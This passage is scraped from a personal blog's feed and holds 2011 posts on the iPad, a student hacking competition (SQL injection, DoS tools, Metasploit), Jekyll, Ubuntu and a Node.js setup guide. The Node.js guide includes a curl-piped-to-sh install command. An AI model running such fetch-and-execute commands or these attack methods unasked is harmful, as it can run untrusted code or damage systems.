Apple land lives happily inside the propertiery Apple File System, I cannot even check it realiabily. And don’t even get me started on the the application transfers. The file sharing system is so bad in iOS that almost evey other app comes built in with a wi-fi or ftp server. When alomst mevery app that deals with files starts ro do that, there is something definately wrong with your file system approach.\nAnd why doesn’t my itunes recognize any video files at all. I was given a warning about needing QuickTime, and I installed it, but it still refuses to play them in iTunes, and doesn’t even give me an error string to hold on to.\nSeriously, iTunes go back to the bloatware land that you came from. I’ll try my luck with something else from now on. And only if someone could give me the specs for the arcane plist format, I might write a PC version of the iBooks app. And calibre needs to fix up its pdf to epub approach. Inline styles are not used anymore, doesn’t it know already.\nA few days later…\nAfter spending a few more days with my iPad, I have developed a love\u002Fhate relationship wit it. I hate the ugly sync process, which still refuses to sync videos, telling me I have to delete everything to start sync. I love it for its ease of use, awesome touch, and aesthetics. I hate it for its lack of support, oepn sync protocols, and most of all Apple’s close mindedness regarding unsigned binaries.\nSeriously Apple, if tablets are the computer of the future, treat them as auch. Let me treat it as a fully functional comouter, which lets me run whatever I want, with whatever privileges I want.\nIf Microsoft had tried to create such a walled garden of apps in Windows, would it have been so successful? Granted, people would love running apps from Windows 8 Marketplace, if only because it would keep their software updated. But Windows at least has a choice,to allow me to download a tiny binary from a small Windows Developer who does not want to pay MS just to let people use his\u002Fher apps.\nAn appstore is an excellent idea, executed brilliantly by Apple, but please follow MS and give us an official way to do whatever the hell I want to do with my iPad.\nA few weeks later…\nI really hate my iPad now, especially once I realise that my cheap Nokia cell phone has tether support, while my iPad does not.  To do any task that may require you access to a normal file system, such as cloning a repository from github, or editing an document anywhere is impossible in the device. I love playing games on it, though, but it seems like a really costly device to play games and read books on. Get the Fire at less than half the price, and root it to install cyanogen mod (which will soon be available for the Fire).\nSometimes, I wonder if Indian carriers would have installed Carrier IQ on an iPad (which comes without a SIM card). I’ll find out as soon as I can root it.\nOne of my friends gave a very serious comment on the iPad : “It seems as if you have rented the device from Apple, rather than bought it”. And I’ve come to realise that its a reflection of the sad state that the electronics manufacturing industry is in today.\nA few more weeks later :\nI jailbroke my iPad :)\nFurther links :\nKindle fire unroots itself\nFire doesnt allow you to visit android marketplace\nCarrier IQ controversy\nNokia dumb phone features - X2-01\nHow I Jailbroke my iPad",[],{"slug":3088,"title":3089,"link":3090,"pubDate":3091,"contentSnippet":3092,"tags":3093,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"cctc-blog","My Experience with the Deloitte Cyber Collegiate Threat Competition (2011)","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F11\u002F20\u002Fcctc-blog\u002F","2011-11-20T00:00:00.000Z","I recently was part of a team at IIT-Roorkee that won the Deloitte Cyber Collegiate Threat Competition. It was a competition modeled after The Deloitte sponsored CCDC in the US. The event will be organized in the subsequent years as well, and hence this blog post will summarize my experience so as to help any future participants. Moreover, the organizing team has guaranteed us that the competition will be altered significantly in the coming years. This was the first year that this event was organized, after all.\nI’ll go into the contest round by round, so beginning with Round 1.\nRound 1\nDeloitte came to our campus, with little promotion about the event. A presentation was given on the current scenario of Cyber Threat, particularly with respect to India. Free swag was awarded to people who asked some good questions, or answered some as well. After the presentation, a quiz was goven out, consisting mainly of questions about Web Application Security. A few of the questions asked to write down code to circumvent a particular issue (like SQL Injection). But it was mostly about stuff that every security conscious Web Developer would know about.\nAfter the quiz, they selected the top 9 candidates, and asked us to form teams. Make sure that you attend the quiz with your friends, as we definitely had an edge by knowing everyone in our team before the event. The number of teams varied from campus to campus. But if you perform decent enough, you will be selected.\nRound 2\nEach of the teams were given a VM Image, and we were asked to hack into it. We were not allowed to exploit vulnerabilities in the guest OS, or things like VMWare, or try to boot into the image with another OS, but other than that everything went.\nThe VM had a library application, with several vulnerabilities. A challenge sheet was mailed to us, and we were expected to finish as many challenges as we could. Any further vulnerabilities not mentioned in the challenge could also be mentioned, but theywere only to be used in the case of a tie with another team.\nThe time duration for Round 2 was 15 days and we were supposed to submit our reports by then. We were able to complete most of the challenges after we found a blind sql injection vulnerablity. Further, we were able to get a copy of the obsfucated PHP code, which we converted to simpler versions easily enough. We had no way to make use of the code, but it did help us in identifying possible files and entry routes for vulnerabilities.\nTo get a good score in round 2, try to attack every point in the application. In our case, some of them were too stupid to be used in a real case scenario. For instance, we had password hashes appearing in images. Pour through the javascript code, and search like hell. Stuff like w3af might help you, but since its a limited application only, it is often easier to just track the application flow. We did try kernel level exploites, but the VM was fully patched and up to date.\nRound 3\nRound 3 was organized at Hyderabad and was a head on hack everything contest. We were handed 3 virtual machines, with lots of vulnerable services. We had to keep those services running, which were periodically pinged by a scorebot. Scores were awarded in three categories : attack, defense, and flags.\nAttack points were earned upon getting a shell on any of the other team’s servers.\nFlag points of awardedon the basis of getting access to secrets stored inside the other team’s servers.\nDefense points were earned on the basis of status of your own service.\nThe network architecture was 3 tiered. A single central router routed requests to a team’s router, which was then connected to an individual team switch. A switch was connected to the host VM, and the attack machines. Two different subnets were created for attack and defense in each team’s router. All uVMs were present in the attack subnets.\nDay 1\nDay 1 consisted mostly of us learning about the network and trying to gain access into the other systems. All the services were highly vulnerable, and as a result, we had to patch that vulnerability in our own servers before we attacked anyone with it. DoS attacks started late in theday, but were ever present.\nThe VMs handed t us included a Windows Server 2003, a debian, and an Ubuntu. Only open source\u002Ffreeware tools were allowed, and we used lots of stuff including :\nBacktrack for almost everything since attack laptops given to us had Windows installed\nLOIC for DoS attacks\nWireshark for packet analysis.\nSnort for intrusion detection.\nNMap for scanning services\nMetasploit for trying out exploits\nCain and Abel for miscellaneous stuff\nDay 2\nDay 2 involves lots of pwning,and a surprise twist. All VMs for day 1 had been reset to their current state, and we had to do patch them all over again in first fifteen minutes of the session. Other than that, the increase in traffic was exponential. All our machines were scanned tonell. DoS attacks became normal, and the epic moment of the day was during the last session when we had our router pwned.\nPics from the Event are at Facebook.\nConclusion\nKudos to the Deloitte Team for organizing such a brilliant contest. We had lots of fun. They have assured us that next year it will be even bigger and better. And that the format will be entirely Different. Ext hear so this blog post might not be as helping as you may have thought.",[],{"slug":3095,"title":3096,"link":3097,"pubDate":3098,"contentSnippet":3099,"tags":3100,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"github-projects-to-follow","Github +1 URLs","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F10\u002F17\u002Fgithub-projects-to-follow\u002F","2011-10-17T00:00:00.000Z","I was working on the Google +1 Listing API (undocumented). So here’s a list of my current +1 urls on github.com. Most of the projects pertain to web-designing. I’ll update this list automatically every week or so, provided I remember to\u002Fset a cron job.\njayferd\u002Fcolor.js\n          \ncolor.js - The missing color library\ntypicaljoe\u002Ftaffydb\n          \ntaffydb - TaffyDB - an open source JavaScript Database for your browser\nantirez\u002Flamernews\n          \nlamernews - Lamer News -- an HN style social news site written in Ruby\u002FSinatra\u002FRedis\u002FJQuery\nfelixge\u002Fnode-mysql\n          \nnode-mysql - A pure node.js JavaScript Client implementing the MySql protocol.\ndaneden\u002Fanimate.css\n          \nanimate.css - A big ol' goody bag filled with CSS animations for WebKit, Firefox and beyond.\njavve\u002Flist\n          \nDo you want a 7 KB cross-browser native JavaScript that makes your plain HTML lists super flexible, searchable, sortable and filterable? Yea\nazer\u002Fjekyll-social-activities\n          \njekyll-social-activities - a jekyll project template to list social network activities\ne1ven\u002FRobohash\n          \nRobohash - RoboHash.org\ndonpark\u002Fnode-robohash\n          \nnode-robohash - node.js implementation of Robohash. It's neither complete nor render general SVG.\nlg\u002Fmarshmallow\n          \nmarshmallow - An open source Campfire server\ntmcw\u002Fbig\n          \nbig - presentations for busy messy hackers\nAll of the Hooks\n          \nService Hooks are available for more events (issues, pull requests, forks, etc). Update them through the API!\nchromakode\u002Fkarmabot\n          \nkarmabot - A highly extensible IRC karma+information bot written in Python.\nmoserware\u002FPHPSkills\n          \nPHPSkills - An implementation of the TrueSkill algorithm in PHP\nnodejitsu\u002Fdocs\n          \ndocs - Community powered rocket fuel for node.js\nspin.js\n          \nAn animated CSS activity indicator with VML fallback.\nAlice.js Demos\n          \nAlice.js Demos. Alice.js (A Lightweight Independent CSS Engine) is a micro JavaScript library focused on using hardware-accelerated capabili\ntcorral\u002FDesign-Patterns-in-Javascript\n          \nDesign-Patterns-in-Javascript - Based in examples on Head First Design Patterns\natduskgreg\u002Fsrender\n          \nsrender - John Resig's Simple Javascript Templating turned into a jQuery Plugin\nmrdavidlaing\u002Ffunctional-javascript\n          \nfunctional-javascript - A fun set of koans to teach you functional programming techniques in Javascript\nmrdavidlaing\u002Fjavascript-koans\n          \njavascript-koans - Koans to learn Javascript\nrobrighter\u002Fcurrent\n          \ncurrent - Node.js app for visualizing http requests on a lan\nbcoe\u002Fendtable\n          \nendtable - A ridiculously simple Object Mapper for Node running on top of CouchDB.\nsproutcore\u002Fsproutcore\n          \nsproutcore - JavaScript Application Framework - JS library only\ntpope's Profile\n          \ntpope (Tim Pope). You're not logged in! Login; Pricing & Signup. Name: Tim Pope. Website\u002FBlog: http:\u002F\u002Ftpo.pe\u002F. Company: Waiting on t\ntpope\u002Fvim-fugitive\n          \nvim-fugitive - fugitive.vim: a Git wrapper so awesome, it should be illegal\ngithub\u002Fgitignore\n          \nA collection of useful .gitignore templates\nChosen - a JavaScript plugin for jQuery and Prototype - makes select boxes better\n          \nStandard Select.\nharvesthq\u002Fchosen\n          \nchosen - Chosen is a library for making long, unwieldy select boxes more friendly.\nrthauby\u002FPaige\n          \nPaige - Super simple project page generation\ndocco.coffee\n          \nDocco is a quick-and-dirty, hundred-line-long, literate-programming-style documentation generator. It produces HTML that displays your comme\nLeaVerou\u002Fprefixfree\n          \nprefixfree - Break free from prefix hell!\ntwitter\u002Fscala_school\n          \nscala_school - Lessons in the Fundamentals of Scala\narcturo\u002Flibrary\n          \nA library of free eBooks we're working on\n tcr\u002Fselection.js\n          \nselection.js - A tiny JavaScript DOM selection library for modern browsers and IE5-8.\nFirst Annual Octocat Dodgeball Invitational\n          \nWhy? We were brainstorming in the office and decided we should throw balls at our enemies. But why stop at destroying our enemies with foam \nnide - Beautiful IDE for Node.JS\n          \nnide. Beautiful IDE for Node.JS. nide is a web-based IDE for Node.js, designed with simplicity and ease-of-use in mind. The current version \nmikeal\u002Frequest\n          \nSimplified HTTP request client.\nunconed\u002FTermKit\n          \nTermKit - Experimental Terminal platform built on WebKit + node.js. Currently only for Mac and Windows, though the prototype works 90% in an\nIf Dropbox Used GitHub’s Pricing Plan\n          \nIf Dropbox Used GitHub's Pricing Plan. What if Dropbox used GitHub's pricing model? Folders? Yes, folders. I have a lot of folders.",[],{"slug":3102,"title":3103,"link":3104,"pubDate":3105,"contentSnippet":3106,"tags":3107,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"awesome-webapps","Must Use Web Applications","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F10\u002F15\u002Fawesome-webapps\u002F","2011-10-15T00:00:00.000Z","Here are a few of the applications that I would heavily recommend.\nWorkflowy\nHere’s how Workflow describes itself.\nWorkFlowy is a simple, but powerful way to manage all the information in your life.\nHere’s their introductory video:\n\n\nIf that does not hook you, I don’t know what will.\nClipboard \nClipboard is a content archiver tool that makes it quick, snappy, easy, and cool. It has got tons of features and is still in private beta. However, since Michael Arrington blogged about it, it has begun accepting larger number of invites. I’ve only started to use it, but it has been quite awesome till now.\nMy favorite feature is embed. Everything I’ve embedded on this page is via clipboard, as a demo. You can clip tweets, pics, videos and what not and embed it on your blog easily.\nGe.tt \nGe.tt is one of the many file sharing sites that seem to have cropped up in Web 2.0. Its USP is its simplicty, however don’t be fooled by it. It has got lots of features as well:\n\nShare URLs while your stuff is uploading\nShare without even logging in\nDrag and drop upload\nVersioning for file Uploads\nShare multiple files under a single upload\nLimited Analytics (See number of Downloads)\nSo yes, its not as powerful as many others, but has got quite enough features to keep me busy.\nMinus] \nMinus is a simple image sharing service. It was amongst the first to offer Drag-And-Drop upload back before it was cool. Right now, it is trying to become the next flickr, allowing people to subscribe to each other. If you are someone who posts cool pics regularly, check this out.\n\nMy primary browser is Chromium, and here are some Chrome Applications that I use regularly:\nOffline GMail \nWas a Chrome extension that used Google Gears for letting you use GMail completely offline.\n\nPros:\nLooks cool\nAllows multiple accounts\nDrafs facility\nLabels\nCons\nNot all the functionality of Online GMail\nCollaborative Editors\nI like collaborative editing, working together with people in real-time. Unfortunately, the biggest entrant fizzed out. However, there are still quite a lot of competitors left in the field.\nGoogle Docs\nI tend to avoid Google Docs usually, as it is too much of a bloat for me. The integration with Google Chat is good, but sometimes all you need is a plain text editor. There is also an Offline Google Docs application, although it does not allow one to edit documents. Also no presentations.\nEtherpad\nEtherpad is quite good, as a plain text collaborative editor. I tend it to use it frequently, and it has some excellent features. It makes a thousand revisions of each of my posts, and allows me to play through them, and see who made wat change in real-time. All this, for free. Plus you get chat, and basic formatting (bold, italics, underline).\nThe previously mentioned workflowy keeps your lists in sync over time, so it is collaborative, though not in real time.\nAlso, mention goes out to pastehtml, which does an excellent job. Its neither collaborative nor has sharing, but it had me hooked at editable markdown. You can type in markdown, publish in html, and come back and edit your documents, as per your your heart’s wish.\nGrooveshark \nI rarely listen to music online, but when I do, its either on Youtube or Grooveshark.\n\nLooking back at this document, it seems that there are not many web-apps that I use.\nSome other applications that I regularly use, in no particular order:\nFreedCamp - A free alternative to Basecamp \nIssueBurner - Simple Issue Tracking via Email\nPostary - A simple blogging platform. “Write.Share.” \nLastPass - Password Manager\nI’ll probably add some Chrome Extensions later as well.",[],{"slug":3109,"title":3110,"link":3111,"pubDate":3112,"contentSnippet":3113,"tags":3114,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"jekyll","Blogging with Jekyll","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F09\u002F19\u002Fjekyll\u002F","2011-09-19T00:00:00.000Z","For the past few years, there has been a revolution in the blogging scene. People have moved towards better hosting providers, better blogging tools, with automated, and delayed blogging becoming the norm. Posts are written months in advance, and proof-read dozens of times, before making it to the general public. Wordpress, Blogspot, Tumblr, Posterous, Texpaterrn are pretty much everything that most of the bloggers use. However, there have been some silent niche entries in this market. Static Site Generators.\nStatic Site Generators\nStatic Site Generators are tools which you use to generate a static version of your site. Instead of using a dynamic scripting language (such as php), your tool takes in your markup & combines it with your blog posts to generate an html only version of your site. This version is then uploaded(for eg, via ftp) and is then visible as your blog. Most such tools are written in languages such as ruby, python, node.js, and erlang. The most commonly known are Jekyll, Hyde, nanoc, and webby. An excellent list is available here.\nBenifits of using Static Site Generators\nMarkup\nFor me, the most important part of using Jekyll is that it allows me to use markdown as my writing syntax. Markdown is a markup language that is compiled to HTML. It is supposed to be a highly readable version of html. For instance it uses backticks(`) to write code.\n`this` becomes this\nAlso, you can use * to emphasize text(strong or emphasis). Link creation is not the horrible \u003Ca href=> that you remember, but the sleek looking [Link text](Link URL). Similarly it offers lots of other features. You can even specify alternative markup languages, such as textile in jekyll configuration.\nEase Of Blogging\nYou can write blog entries very easily. I’ve added markdown syntax bindings to vim, my favorite editor, and geany has a markdown plugin as well. I am of the opinion that you should write text entries in a text-editor, not a textarea in a browser window. I used Windows Live Writer for quite some time and still believe that it is far ahead of anything else in the market. But the wpost format that it uses is propertiery, and as such stopped me from importing blog posts anywhere.\nRevision Control\nRevision Control, such as git, works best with text-files. Since your blog entries are now just plain text files, you can easily store them under version control, easily reverting blotched commits, making branches, and merging errors. And in case you do not know it yet, git is awesome!\nLayout Tools\nJekyll allows you to define your layout using Liquid Templating. {{content}} translates to the variable content. Similarly you can iterate over blog posts, by using Liquid tags for foreach. The best part is that this is all done before publishing your website, meaning that the final result is always just pure html. You can easily create static portions of your site (such as headers, footers, sidebars).\nGetting Started With Jekyll\nI’ll start with jekyll, since it is the most used one out there, and runs on github. It even powers this very blog. First, you must install jekyll. On an Ubuntu machine, sudo apt-get install ruby rubygems && gem install jekyll should work. If you are working on development using Ruby, I’d recommend you to rvm, instead of plain vanilla distro ruby installs. For windows folks, install Ruby, and the Devkit using RubyInstaller.org. After that run gem install jekyll.\nInstead of preparing a site from scratch, we will instead be forking an existing site running on jekyll, and using it to model our own. This is partly to shield this tutorial from html\u002Fcss\u002Fjs which is irrelevant in this case. In this particular case, I will be using my very own website. Download the source code for my website from github and extract it somewhere. Next, you will have to delete all the content inside the _posts, projects, _drafts, contact, & data directories as I do not give permission to you do use those in your site.\nNext, create a file called _posts\u002F2011-month-date.md with the following format :\nNow, open up the _layouts\u002F and edit default.html. You’d need basic html skills to replace my photo with your own, and change links to various places. After you are done, just cd into the root directory of the site, and run jekyll. Some output should confirm that the server ran successfully. Open up http:\u002F\u002Flocalhost:4000 in your browser, and you will see your web-site running.\nNow for the hosting part. All of your current site is hosted in _site folder, so you can upload it anytime you want. Or, if you want, you can use github as your hosting provider. Just follow the instructions on pages.github.com and you should be be up and running in no time.",[],{"slug":3116,"title":3117,"link":3118,"pubDate":3119,"contentSnippet":3120,"tags":3121,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"6-months-of-ubuntu","Six Months of Ubuntu","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F09\u002F13\u002F6-months-of-ubuntu\u002F","2011-09-13T00:00:00.000Z","I installed Ubuntu as my primary OS back sometime in February. Not that I’d not tried it earlier. In fact, I’d used a copy of Ubuntu 3 back in day. But this time around, Windows (from my dual boot) just gave up and died. The partition with Windows got heavily corrupted, lost lots of data, and ultimately I had to format it. And Ubuntu dragged through all that. And here I’m today, a veteran of 3 Ubuntu versions, starting with 10.10, and right now on the 11.10 beta.\nWhat have I learned ? That its better than Windows, for one. But several other things as well. I’m writing this post from the general linux-distro scene, and not just Ubuntu in specific. For the period before Feb, I’d been using Linux Mint as my primary OS for quite some time. But Ubuntu Natty Alpha brought all that Unity love (which I doted on once), and I had to move to 11.04\nReasons to switch to Linux\nIts free!\nIts free! No more paying up for Windows. People who had Windows ship with their computers would be delighted to know that there is something called a Windows Refund, which allows you to be compensated by the cost of Windows, if you decide not to use it.\nBetter file system. If you’ve ever lost yourself in the mirth of files in “Program Files”, “AppData”, “Application Data”, “sytem32” and the like, you’d be delighted to know that there is a very well balanced binary management system in Linux. All binaries are in PATH, unlike Windows, where some softwares do that, and most don’t. So you can actually run php, git, ruby from any damn place that you want. People who have tried to compile Java programs using javac on Windows might remembring updating PATH in Windows. No more of that in Linux.\nFree softwares! The majority of good software on Windows is paid (and even more with Mac). But in the Linux world, (almost) everything is free. What is paid for then? Some games, high level commercial softwares and the like. But most of the stuff is free.\nPackage Management Apparently Windows 8 will have some sort of app-store with it. Which is a long time coming in Windows. But guess what, almost all Linux distros have some flavor of package manager built in. Debian (and Ubuntu) has apt-get, Arch has pacman, Fedora has yum. And installing softwares is as easy as it could be. Need mysql? Just type sudo apt-get install mysql. Done. Boom. Just like that.\nCustomization Level Even though I don’t like the messing up of Gnome by Ubuntu, there are tons of alternatives available. I’m right now using Gnome-Shell, and have plans to move to xmonad, which is another Window Manager. Almost every feature on the Linux desktop can be customized.\nTerminal I’d always had planned several learn bash scripting kind of to-dos but never got to it until I started using Linux. Even if you don’t script, the actual power of your machine is opened by the terminal. Hacking away in vim, and browsing sites using elinks, and ordering Pizzas in Command Line is as geeky as it gets. Gnome is designed in such a way to allow a normal user to use his computer fully without touching the terminal, but if you use it, it gets better & better.\nApplications There was a time I used to be a Windows fanatic, using WMP, Zune, Everything and what not. But now, I’ve got a bigger arsenal of softwares. Ever used Audacious? That’s my default music player, and its awesome.\nSoftware Development You use Windows to develop stuff for Windows. I’m nowhere near to writing applications in C#. I’ll probably be hacking away scripts in ruby, node, python, bash, and building stuff using xul, gtk, webgtk, and qt. All my web applications are ultimately deployed on Linux machines, so it makes sense to write them on Linux. And only Linux has the ease of language package managers, like rubygems, npm, and pip.\nOpen Source I haven’t yet checked out the Linux Kernel source code, but I’m thinking of getting my hands dirty real soon. Ever since I’ve joined github, I’ve been introduced to several awesome coders, projects, and organizations. And guess what? Its all open source! Meaning I actually spend less time writing parsers for xml, and more time working on applications.\nWhat I’ve Learned\nBe utterly fearless Back when I was in Windows, a simple partition deletion used to scare me to death. Now? I’m ready for anything. If you, like me, go play with the alpha of all your favorite stuff, then things will break. And it will be fun to solve all that stuff. You will learn a thousand new things in the process, gain lots of rep on askubuntu, and become a Ubuntu Jedi Master. OK, maybe not the last bit, but you shall become utterly fearless of all danger. I had to use my computer without network accesibility for three days. And it didn’t even give me a GUI. So I just drudged along for 3 days straight on the console. :)\nCommunity Sometimes, I feel people do not get my helpful comments, and offerings of help on Facebook. Its not their fault. They’ve never been introduced to a proper online, helpful community before. The Linux community is helpful, worldwide, readily available, and has probably handled the problem that you are facing now.\nServer Administration I’m still lacking on the cloud front, as I don’t have servers powerful enough to host virtual machines. But otherwise, I’ve handled lots of stuff. ssh is my thing, and I use git to deploy applications like a pro. I’ve moved on from apache to nginx to cherokee and what not.\nTake Backups Remember all those “Take Backups before installing Windows\u002FUbuntu” things that popup while installing your OS. I never paid attention to them, until recently. Now, I’ve got backups scheduled on Dropbox, SpiderOak, and a custom SparkleShare server. I make sure to host my code on github, or my personal git repositories and backup images to Picasa. Everyone knows hard discs are unreliable, so why not make your data redundant and take backups.\nThe only counter argument would be that Windows has much more stream-lined view of things, with almost everything offering a GUI based application to amange stuff. That’s just not the Linux way. Still, I’m not one of those crazy fanatics who go around preaching Linux (maybe I am!). I feel that if you are using your computer to just open Chrome, Firefox, VLC, and Word, then anything would do. You could probably install android on your computer and do everything you are doing right now. If you are a heavy gamer, then better stay with Windows. And if you are a programmer, switch to Linux.\nWindows 8\nI installed a developer preview copy of Windows 8 recently, and although I was really awed by its designs concepts, I feel that it is still lacking in certain fronts. For instance, it seems to me that Microsoft is trying to get 8 to the tablets much more readily than on the desktops. Why? Because, there is nothing that can undermine Windows superior market share in Desktops for the near future. However Android & iOS have a very strong presence. Ergo, Windows 8 goes to tables.\nI installed all my favorite programs on Windows 8, but had to switch back after a few days. As a developer, it just does not offer me the same freedom, and easy workflow that I am accustomed to. For instance :\nInstalling Ruby with build support for gems took a lot of time and patience.\nCygwin does not compare anywhere near to a bash shell. Its like this tiny humble brother of shell who turns away when you say PATH. You have to type all those monstrous C:\u002F\\ kind of paths.\nNo App Store. Windows 8 dev preview does not have an app store yet, which was one of the reasons I had tried Win8. I’m used to frequently browsing the Ubuntu Software Center just to find something that fits.\nI found that my productivity reduced to half when I was on Windows. I spent too much time looking for stuff which could be done by a single line bash on Linux\nTags: operating systems, linux, ubuntu, windows 8, weblog ifest 2011",[],{"slug":3123,"title":3124,"link":3125,"pubDate":3126,"contentSnippet":3127,"tags":3128,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"programming-in-nodejs","Programming in Node.JS","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F09\u002F12\u002Fprogramming-in-nodejs\u002F","2011-09-12T00:00:00.000Z","After my attempts at python, Ruby on Rails, this was the time for node.js. You ask me what is node.js ? Remember when Google Chrome came out and went blazing past the rest of the browsers in Javascript benchmarks. That was because of its internal Javascript Engine, called V8.\nSoon, V8 was developed as a backend to an evented IO library, that is now known as node.js. Initially, it was named just node, but to prevent confusion, and explain its javascript inheritance, it was renamed node.js. This is the water-cooler moment of the language. If you know node, you’re the cool guy on the block. So what is so special in node ?\nEvented IO\nBasically node allows you bring home the same good anonymous functions from JQuery on your server. In advanced terms, node allows evented input\u002Foutput, meaning all the IO calls are non-blocking and evented, or scheduled in parallel.\nTraditional I\u002FO:\nEvented I\u002FO:\nHow To Install\nThe official installation guide is present at https:\u002F\u002Fgithub.com\u002Fjoyent\u002Fnode\u002Fwiki\u002FInstallation. I’d present a slightly different version, using nvm, i.e Node Version Manager.\nUnix\u002FLinux\nDependencies\nThere are some dependencies on installing node.\nsudo apt-get install git-core build-essentials libssl-dev\nRun the corresponding command for your distro (yum etc).\nInstalling nvm\nClone nvm:\ngit clone https:\u002F\u002Fgithub.com\u002Fcreationix\u002Fnvm.git ~\u002F.nvm\nInclude nvm:\n. ~\u002F.nvm\u002Fnvm.sh \u002F\u002FThe dot is important\nSource it to your bash file. Basically copy the above command(2) inside your ~\u002F.bashrc.\nFetching node\nNode is under heavy development at the moment. Development of node is carried across a stable & a testing branch. The stable branch is the one that you should prefer. As of now, stable is v0.4.11 and testing has reached v0.5.6.\nNow run the following commands:\nnvm install v0.4.11 to install v0.4.11\nnvm use v0.4.11\nnvm alias default v.04.11 to make it default\nYou can type which node to see the actual node binaries being used.\nPackage Methods\nI would strongly advice against using your distro versions of node, unless you are on a rolling release distro, such as Arch. Please do not run sudo apt-get install node to install node. This would only cause much anguish and pain later on.\nAs of now, even the beta of Ubuntu 11.10 holds v0.4.9 and is likely to do so for the next 6 months.\nWindows\nAs I’ve stopped using Windows for quite some time, here are instructions from the official node installation guide.\nWindows Build (Node v0.5.5): http:\u002F\u002Fnodejs.org\u002Fdist\u002Fv0.5.5\u002Fnode.exe\nI would again recommend to install http:\u002F\u002Fnodejs.org\u002Fdist\u002Fv0.4.11\u002Fnode.exe for stability reasons.\nSelf-contained binaries are available at http:\u002F\u002Fnode-js.prcn.co.cc\nNode Package Manager\nAll cool programming languages come with their own package managers. Ruby has rubygems, Python has pip, PHP has PECL, perl has CPAN, and node has npm.\nnpm holds a large collection of packages that are the extra batteries that don’t come included in node. If you need to parse documents, or do some other fancy stuff in node, don’t look farther than npm. If you need it, chances are, it already has a package in npm. See list of packages on the npm site.\nUnix\nA simple one line install is available for npm\ncurl http:\u002F\u002Fnpmjs.org\u002Finstall.sh | sh\nAfter that, you can install any package by npm install package. For instance, install jade by npm install jade\nWindows folks can clone the npm repository and run the included nmp.bat file, and hope that it works.\nSimple Servers in Node\nnode.js comes with “batteries included”, and part of that battery is node’s ability to instantly create web servers. Yes, right inside your program, you can easily create web servers, which will hold full compliance to HTTP.\nThis is a very simple HTTP server, written using the http module(included) in node :\nvar http=require('http');\nhttp.createServer(function(request, response) {\n  var headers = { \"Content-Type\": \"text\u002Fplain\" };\n  response.sendHeader(200, headers);\n  response.sendBody(\"Hello, World!\\n\");\n  response.finish();\n}).listen(8000);\n\nAs you can see, the createServer function takes a callback function as its argument. The callback function is called for each of the requests. All events are handled easily and instead of a server handling threads, memory etc, node just handles requests. In essence, a request generates an event, which is then handled by the callback function provided.\nThis is quite similar to the way we program event loops in javascript on the browser.\nThe good stuff\nThere are loads of interesting projects using node. Visit the modules section on the node wiki for a list of interesting node modules available. These include node clients for various libraries such as Databases(mysql, postgre, sqlite, Cassandra etc), Microframeworks (lik Sinatra), Frameworks, wikis, CMS, parsers and what not.\nI’d recommend starting out with Connect which is a middleware for node, and allows you to wrap your application easily around it. For databases, you can either go with the standard Relational ones(like mysql) or be brave, and take a spin with the noSQL ones like CouchDB, Cassandra, or MongoDB. All of them have native bindings available for node.js.\nReferences\nNode On GitHub, including the wiki, documentation & code\nNodejs.org\nBlogs & Other resources\nNodeJitsu, a company working completely on node. \nGetting Started with Node.JS, Express and CouchDB\n6 Must Have Node.js Modules\nSome cool node projects\nHowToNode\nThe node Beginner book\nNodeCasts\nStackOverflow Questions on node\nHow to store Node.js deployment settings\u002Fconfiguration files?\nHow do I get started with NodeJS\nWhat is node.js\nWhere to host node.js applications",[],{"slug":3130,"title":3131,"link":3132,"pubDate":3133,"contentSnippet":3134,"tags":3135,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"learning-ruby-on-rails","Learning Ruby on Rails","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F08\u002F01\u002Flearning-ruby-on-rails\u002F","2011-08-01T00:00:00.000Z","Continuing my quest on Web Designing, I’ve started learning Ruby On Rails, which is like the most-hyped web framefork of the moment. After all, Github runs on Ruby On Rails, Redmine uses Rails, and so do Basecamp,Hulu,Scribd, and even Twitter. Even though RoR has Ruby in its name, its just a namesake.\nLearning Ruby and learning Rails are entirely two different routes, and learning one only gives you a slight advantage in the other. I’m learning Rails by the excellent book, Ruby On Rails 3 Tutorial, by Michael Hartl. It covers Rails 3, which is one reason I picked it as Rails 3 is quite different from Rails 2 in comparision.\nRails in a few words would be described as a Web framework that makes writing web applications really, really easy. And I really mean that. I’ve been programming in Rails for ~2 days, and I can confortably say that it is better than any other PHP framework (viz CakePHP, CodeIgniter, Kohana) simple because it is powered by Ruby.\nAnd the beauty of Ruby is not in its implementation, but in its elegance. Reading ruby code is lie reading seeing a visual presentation. While PHP is the paragraphed, prose version of the same stuff. Simply put, PHP allows you to do the same things, but essentialy it was not readable enough to match Ruby’s elegance.\nRails follows the MVC pattern (Model-View-Controller) for development, and uses it strictly. It has got its own conventions, but as I found out, the concept of convention over Configuration makes much more sense in Rails than it ever did in PHP. All that time I spent in the CakePHP console was nothing compared to the interactivity of the Rails Console(rails c). Starting development server(rails s) is as easy as running the production server(rails s --environment production).\nInstead of writing down another beginner tutorial on Rails, I’d rather direct you to some of the excellent Rails resources :\nRuby on Rails 3 Tutorial, the book I’m reading for learning Rails. Highly recommended\nRailsBrains, offline API for Rails\nRails Getting Started, Official Rails Getting Started guide\nRails@Stackoverflow",[],{"slug":3137,"title":3138,"link":3139,"pubDate":3140,"contentSnippet":3141,"tags":3142,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"announcing-planet-iitr","Announcing Planet IITR","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2011\u002F07\u002F09\u002Fannouncing-planet-iitr\u002F","2011-07-09T00:00:00.000Z","Planet IIT-R is a blog collection similar to the Planet Ubuntu, Wordpress, and the likes. The basic idea is to create a single address where all blogs of IIT-R are 